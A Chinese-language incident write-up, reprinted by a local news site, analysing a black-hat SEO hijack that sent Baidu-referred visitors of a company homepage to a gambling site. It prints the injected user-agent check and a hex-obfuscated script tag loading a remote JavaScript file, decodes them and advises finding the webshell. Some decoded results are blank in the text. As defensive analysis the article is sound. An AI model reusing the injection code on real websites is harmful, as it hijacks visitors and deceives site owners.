[dns被劫持怎么办]详解分析,解决黑帽seo劫持问题。网站从百度搜索进去,首页发生跳转到菠菜网,开发公司的说可能是百度的问题,不是我们的问题,针对这个就想提一下,首先遇到问题就去分析问题,再去找出问题,然后解决问题,最后做好防范措施,而不是首先就想着推脱责任。
if (navigator.userAgent.toLocaleLowerCase().indexOf("baidu") == -1)
直接进入正题site:(这里隐去了开发公司的网站网址,用来代替)
打开首页发生了跳转,到https://www.***.com/zh-cn/这个菠菜网,其他页面没有,劫持代码只放在首页,我们直接看代码
如果是无法直接从首页查看源码的情况,那么在浏览器输入view-source:就可以查看网页源码
只需要看头部代码好熟悉,黑帽seo这行技术这几年也没什么创新,删除这两行就可以解决基本问题
这段意思就是判断百度搜索访问用户进行跳转,你去360,搜狗搜索访问肯定是不会发生跳转的,然后我们再来解最后一段代码
先进行js解压,得出结果
javascript代码方式解密
1:\\x64\\x6f\\x63\\x75\\x6d\\x65\\x6e\\x74 结果 document
2:\\x77\\x72\\x69\\x74\\x65 结果 write
3:\\x3c\\x73\\x63\\x72\\x69\\x70\\x74 \\x74\\x79\\x70\\x65\\x3d\\x22\\x74\\x65\\x78\\x74\\x2f\\x6a\\x61\\x76\\x61\\x73\\x63\\x72\\x69\\x70\\x74\\x22\\x73\\x72\\x63\\x3d\\x22\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x77\\x77\\x77\\x2e\\x62\\x63\\x64\\x61\\x73\\x38\\x2e\\x63\\x6f\\x6d\\x2f\\x33\\x36\\x35\\x2e\\x6a\\x73\\x22\\x3e\\x3c\\x2f\\x73\\x63\\x72\\x69\\x70\\x74\\x3e
结果
整段的解密结果就是:
");
到了这里整个过程已经很清晰了,虽然我们删除了这段代码但只能暂时解决问题,需要找出webshell,做一个全面的网站和服务器安全策略,这种批量GetShell的基本上都是通过目前已经开放的漏洞,所以相对还是比较容易处理。
大多数人对网站的理解还停留在视觉层面,网络安全的重要性反而被忽视,任何公司都需要提高对网络安全的重视。
文章标题:[dns被劫持怎么办]详解分析,解决黑帽seo劫持问题
延伸:
用js解密工具:https://www.sojson.com/jsjiemi.html
1.贴上脚本代码到解密窗口,点击js解密;
js解密后结果:
< script type = "text/javascript" > window["document"]["write"]('
');
< /script>
①福鼎生活网上发布的所在信息未经本网授权,不得转载、摘编或利用其它方式使用。已经本网授权使用作品的,应在授权范围内使用,并注明“来源:福鼎生活网”或“来源:http://www.51ggwu.com”。违反上述声明者,本网将追究其相关法律责任。
②本网转载其他媒体稿件是为了传播更多的信息,此类稿件不代表本网观点。如果本网转载的稿件涉及您的版权、名誉权等问题,请尽快与本网联系,本网将依照国家相关法律法规尽快删除处理。